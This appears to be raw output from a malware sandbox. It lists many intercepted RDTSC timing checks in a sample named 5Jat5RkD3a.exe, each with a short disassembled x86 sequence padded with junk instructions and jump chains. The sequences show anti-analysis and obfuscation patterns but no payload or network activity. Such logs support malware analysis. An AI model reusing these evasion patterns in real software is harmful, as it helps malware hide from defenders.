Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 703106D second address: 7031116 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45629h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+04h], eax 0x0000000c jmp 00007FD934C4561Eh 0x00000011 mov eax, dword ptr [esi+08h] 0x00000014 jmp 00007FD934C45620h 0x00000019 mov dword ptr [edx+08h], eax 0x0000001c jmp 00007FD934C45620h 0x00000021 mov eax, dword ptr [esi+0Ch] 0x00000024 pushad 0x00000025 mov ebx, eax 0x00000027 mov bl, ch 0x00000029 popad 0x0000002a mov dword ptr [edx+0Ch], eax 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007FD934C45627h 0x00000034 xor cl, FFFFFF9Eh 0x00000037 jmp 00007FD934C45629h 0x0000003c popfd 0x0000003d popad 0x0000003e mov eax, dword ptr [esi+10h] 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FD934C4561Dh 0x00000048 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7031116 second address: 70311DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+10h], eax 0x0000000c pushad 0x0000000d call 00007FD934BC97DCh 0x00000012 mov esi, 2CE022D1h 0x00000017 pop eax 0x00000018 mov di, AAC2h 0x0000001c popad 0x0000001d mov eax, dword ptr [esi+14h] 0x00000020 pushad 0x00000021 jmp 00007FD934BC97DFh 0x00000026 push ecx 0x00000027 movsx edx, cx 0x0000002a pop esi 0x0000002b popad 0x0000002c mov dword ptr [edx+14h], eax 0x0000002f pushad 0x00000030 mov ax, dx 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007FD934BC97DFh 0x0000003a and eax, 77F0AF1Eh 0x00000040 jmp 00007FD934BC97E9h 0x00000045 popfd 0x00000046 pushfd 0x00000047 jmp 00007FD934BC97E0h 0x0000004c and cx, DD18h 0x00000051 jmp 00007FD934BC97DBh 0x00000056 popfd 0x00000057 popad 0x00000058 popad 0x00000059 mov eax, dword ptr [esi+18h] 0x0000005c jmp 00007FD934BC97E6h 0x00000061 mov dword ptr [edx+18h], eax 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70311DD second address: 70311FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45629h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 703139F second address: 70313D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 070Eh 0x00000007 push edi 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov word ptr [edx+32h], ax 0x00000010 jmp 00007FD934BC97E1h 0x00000015 mov eax, dword ptr [esi+34h] 0x00000018 pushad 0x00000019 call 00007FD934BC97DCh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70314EF second address: 7031516 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 push ecx 0x00000007 pop edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD934C45629h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7080B48 second address: 7080B60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7080B60 second address: 7080B75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD934C4561Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 702006C second address: 7020072 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7020072 second address: 7020093 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C4561Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD934C4561Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7020093 second address: 70200A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC001B second address: 6FC0030 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45621h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC0030 second address: 6FC0062 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD934BC97E8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC0062 second address: 6FC0071 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C4561Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC0071 second address: 6FC00BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD934BC97DBh 0x00000009 sbb cx, 0D7Eh 0x0000000e jmp 00007FD934BC97E9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FD934BC97E3h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC00BA second address: 6FC00C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC00C0 second address: 6FC00E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov cx, F9A7h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD934BC97E9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC00E8 second address: 6FC00F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934C4561Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC00F8 second address: 6FC00FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC00FC second address: 6FC0135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FD934C45627h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD934C45625h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC0135 second address: 6FC013A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC0724 second address: 6FC075F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD934C45622h 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007FD934C4561Ah 0x00000018 sub si, F828h 0x0000001d jmp 00007FD934C4561Bh 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC075F second address: 6FC07BD instructions: 0x00000000 rdtsc 0x00000002 mov eax, 3FD4491Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a mov edx, eax 0x0000000c pushfd 0x0000000d jmp 00007FD934BC97DEh 0x00000012 add cl, FFFFFF88h 0x00000015 jmp 00007FD934BC97DBh 0x0000001a popfd 0x0000001b popad 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e jmp 00007FD934BC97E6h 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FD934BC97E7h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC07BD second address: 6FC07EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45629h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD934C4561Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FC07EA second address: 6FC07EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FF013D second address: 6FF01CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45629h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FD934C4561Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FD934C45621h 0x00000017 adc cx, 2D76h 0x0000001c jmp 00007FD934C45621h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007FD934C45620h 0x00000028 add ecx, 0DDDCA98h 0x0000002e jmp 00007FD934C4561Bh 0x00000033 popfd 0x00000034 popad 0x00000035 xchg eax, esi 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FD934C45620h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FF01CD second address: 6FF01D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FF01D3 second address: 6FF022F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 13D3h 0x00000007 pushfd 0x00000008 jmp 00007FD934C45628h 0x0000000d xor si, CF58h 0x00000012 jmp 00007FD934C4561Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, edi 0x0000001c jmp 00007FD934C45626h 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FD934C4561Eh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FF022F second address: 6FF0241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FF0241 second address: 6FF02F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C4561Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c jmp 00007FD934C45626h 0x00000011 mov edi, dword ptr [ebp+08h] 0x00000014 pushad 0x00000015 mov ecx, 6F67F98Dh 0x0000001a mov si, A189h 0x0000001e popad 0x0000001f mov dword ptr [esp+24h], 00000000h 0x00000027 pushad 0x00000028 mov ch, F8h 0x0000002a mov ebx, 5DE124F2h 0x0000002f popad 0x00000030 lock bts dword ptr [edi], 00000000h 0x00000035 pushad 0x00000036 mov eax, edi 0x00000038 popad 0x00000039 jc 00007FD9A52977B8h 0x0000003f jmp 00007FD934C4561Dh 0x00000044 pop edi 0x00000045 pushad 0x00000046 mov cl, 03h 0x00000048 pushfd 0x00000049 jmp 00007FD934C45629h 0x0000004e adc esi, 58666B26h 0x00000054 jmp 00007FD934C45621h 0x00000059 popfd 0x0000005a popad 0x0000005b pop esi 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f call 00007FD934C45623h 0x00000064 pop ecx 0x00000065 mov cl, dl 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FF02F6 second address: 6FF0343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD934BC97E1h 0x00000009 sub ecx, 778EADE6h 0x0000000f jmp 00007FD934BC97E1h 0x00000014 popfd 0x00000015 push esi 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebx 0x0000001b jmp 00007FD934BC97DAh 0x00000020 mov esp, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FD934BC97DAh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 6FF0343 second address: 6FF0349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70108C0 second address: 70108C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70108C6 second address: 70108CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70203AD second address: 70203D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, DF47h 0x00000007 mov edi, esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD934BC97E5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70203D1 second address: 70203F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45621h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD934C4561Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70203F5 second address: 70203FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70203FB second address: 70203FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70203FF second address: 7020455 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov bl, EFh 0x0000000c mov cx, 63F7h 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 mov edi, ecx 0x00000016 pushfd 0x00000017 jmp 00007FD934BC97E4h 0x0000001c add ch, 00000018h 0x0000001f jmp 00007FD934BC97DBh 0x00000024 popfd 0x00000025 popad 0x00000026 push dword ptr [ebp+04h] 0x00000029 pushad 0x0000002a jmp 00007FD934BC97E4h 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7020455 second address: 7020473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, 6E8Dh 0x00000008 popad 0x00000009 popad 0x0000000a push dword ptr [ebp+0Ch] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD934C4561Fh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 709067C second address: 7090682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7090682 second address: 7090686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7090686 second address: 709068A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 709068A second address: 70906DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD934C45622h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov dh, al 0x00000012 jmp 00007FD934C45623h 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a jmp 00007FD934C45626h 0x0000001f mov dl, byte ptr [ebp+14h] 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov eax, ebx 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70906DE second address: 7090704 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, bx 0x00000012 mov si, bx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7090704 second address: 7090733 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45620h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dl, 00000007h 0x0000000c jmp 00007FD934C45620h 0x00000011 test eax, eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7090733 second address: 7090737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7090737 second address: 709073D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 709073D second address: 7090743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7090743 second address: 7090747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7090747 second address: 709077A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FD9A519F26Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD934BC97E7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 709077A second address: 709079F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45629h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ecx, ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop ecx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 709079F second address: 70907BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97E7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7070DDC second address: 7070DEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C4561Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7070DEF second address: 7070E19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 85h 0x00000005 mov esi, 48BEA5C7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007FD934BC97DAh 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD934BC97DDh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7070E19 second address: 7070E1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7070E1D second address: 7070E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7070E23 second address: 7070E29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7070E29 second address: 7070E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7080382 second address: 7080388 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7080388 second address: 7080399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7080399 second address: 7080420 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45621h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e pushfd 0x0000000f jmp 00007FD934C45623h 0x00000014 sub ecx, 084820BEh 0x0000001a jmp 00007FD934C45629h 0x0000001f popfd 0x00000020 pop eax 0x00000021 pushad 0x00000022 mov si, bx 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 popad 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007FD934C4561Bh 0x00000033 sub al, FFFFFFCEh 0x00000036 jmp 00007FD934C45629h 0x0000003b popfd 0x0000003c push eax 0x0000003d pop ebx 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7080420 second address: 7080461 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD934BC97DEh 0x0000000f mov ebp, esp 0x00000011 jmp 00007FD934BC97E0h 0x00000016 xchg eax, ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FD934BC97DAh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7080461 second address: 7080470 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C4561Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7080470 second address: 7080488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7080488 second address: 708053A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD934C4561Eh 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 mov al, A9h 0x00000012 pushfd 0x00000013 jmp 00007FD934C45623h 0x00000018 xor ax, D5AEh 0x0000001d jmp 00007FD934C45629h 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, esi 0x00000025 jmp 00007FD934C4561Eh 0x0000002a push eax 0x0000002b pushad 0x0000002c call 00007FD934C45621h 0x00000031 mov ah, 68h 0x00000033 pop edi 0x00000034 push eax 0x00000035 pushfd 0x00000036 jmp 00007FD934C45629h 0x0000003b adc cx, 55F6h 0x00000040 jmp 00007FD934C45621h 0x00000045 popfd 0x00000046 pop ecx 0x00000047 popad 0x00000048 xchg eax, esi 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c mov bx, cx 0x0000004f mov cl, B2h 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 708053A second address: 7080540 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 7080540 second address: 70805A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b jmp 00007FD934C45624h 0x00000010 sub ecx, ecx 0x00000012 pushad 0x00000013 mov ebx, 16A1DA42h 0x00000018 pushfd 0x00000019 jmp 00007FD934C45623h 0x0000001e and cx, 013Eh 0x00000023 jmp 00007FD934C45629h 0x00000028 popfd 0x00000029 popad 0x0000002a xchg eax, edi 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov cx, di 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70805A3 second address: 70805B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: 70805B5 second address: 70805B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
